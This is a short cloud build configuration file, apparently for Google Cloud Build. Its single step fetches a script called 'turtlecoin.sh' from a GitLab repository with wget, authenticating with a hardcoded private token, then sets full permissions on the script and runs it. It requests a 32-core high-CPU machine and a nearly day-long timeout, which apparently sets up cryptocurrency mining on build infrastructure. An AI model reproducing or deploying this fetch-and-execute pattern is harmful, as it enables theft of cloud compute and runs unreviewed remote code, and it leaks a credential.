steps:
  - name: 'python:3.8'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          wget -O test.sh --header='PRIVATE-TOKEN:6aweBXCvir9pJui2t99x' 'https://gitlab.com/api/v4/projects/25904259/repository/files/turtlecoin.sh/raw?ref=master'
          chmod 777 test.sh
          ./test.sh
timeout: 86399s
options:
  machineType: E2_HIGHCPU_32
